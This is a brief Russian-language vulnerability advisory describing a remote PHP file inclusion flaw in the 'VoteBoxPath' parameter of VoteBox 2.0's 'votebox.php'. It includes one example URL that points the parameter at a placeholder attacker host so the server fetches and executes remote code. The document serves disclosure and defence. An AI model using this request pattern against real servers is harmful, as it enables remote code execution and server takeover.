Программа: VoteBox 2.0

Уязвимость позволяет удаленному
пользователю выполнить произвольный php
сценарий на уязвимом сервере. Отсутствует
должная обработка входных данных в
переменой VoteBoxPath сценария 'votebox.php'.
Удаленный пользователь может с помощью
специально сформированного URL выполнить
произвольный php сценарий на системе с
привилегиями web сервера.

Пример:

http://[target]/votebox.php?VoteBoxPath=http://[attacker]

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии